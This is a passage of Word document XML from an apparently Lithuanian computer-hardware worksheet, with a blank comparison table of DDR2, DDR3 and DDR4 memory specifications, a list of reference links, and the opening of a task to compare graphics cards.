              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DDR SDRAM atminties standartas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="56B3F00A" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DDR2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="500C82BA" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DDR3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0B000446" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DDR4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="03610042" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="03B940B8"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Prefeksas (Prefetch bit per bank)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="74F48245" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="63369071"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3F503729"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4A11F510" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B5387B8"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lastRenderedPageBreak/>
              <w:t>Darbiniai dažniai (Date Rate MHz)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0E8A69F9" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6F103DE9" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5D240649" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5B56F24B" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2DF338C9"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Perdavimo greitis (Transfer Rate GB/s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="66D645EB" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="45452C7A" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="09C81193" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4A91103F" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="319A026F"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Įtampa (Voltage V)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7C5C3855" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="78EA172D" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="478814C1" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="62575009" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3A291C73"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Atstumas nuo pradžios plokštelės iki išpjovos (Cm)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="56354044" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53EF5E66" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="210545E6" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="504C306E" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4AA64E0C" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Išleidimo metai į rinką</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="690D07F6" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="33F74DE5" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="317428C1" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15EACE45" w14:textId="26BB3959" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF7EC87" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2139F17A" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">SDRAM vs DDR: what are the differences? </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Crucial. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://www.crucial.com/articles/about-memory/difference-among-ddr2-ddr3-and-ddr4-memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F1A7AB" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="00BA57B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the difference between SDRAM, DDR1, DDR2, DDR3 and DDR4? </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Transcend. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId195" w:anchor=":~:text=DDR2%20memory%20is%20at%20the,improved%20I%2FO%20bus%20signal.&amp;text=DDR4%20SDRAM%20provides%20the%20lower,2133~3200%20MT%2Fs">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.transcend-info.com/Support/FAQ-296#:~:text=DDR2%20memory%20is%20at%20the,improved%20I%2FO%20bus%20signal.&amp;text=DDR4%20SDRAM%20provides%20the%20lower,2133~3200%20MT%2Fs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBA1680" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">DDR, DDR2, and DDR3 Memory for Intel® Desktop Boards. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intel. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://www.intel.com/content/www/us/en/support/articles/000005843/boards-and-kits/desktop-boards.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDFBFF" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">What’s the Difference Between DDR2, DDR3, and DDR4 RAM? (2019, spalio 8). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Gadgetsexplorer.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId196">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://gadgetsexplorer.com/2019/10/08/whats-the-difference-between-ddr2-ddr3-and-ddr4-ram/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0AB95B21" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">DDR1, DDR2, DDR3, and DDR4 RAM memory: What are their differences? (2020, spalio 6). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">TechLog360. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId197">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://techlog360.com/ddr1-ddr2-ddr3-ddr4-ram-differences/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03E9AD46" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A91752" w14:textId="67E35167" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PALYGINTI KELIŲ GAMINTOJŲ VAIZDO PLOKŠTES</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07497B4A" w14:textId="234DBB92" w:rsidR="00204C46" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">kelių gamintojų vaizdo plokštes </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pvz.</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
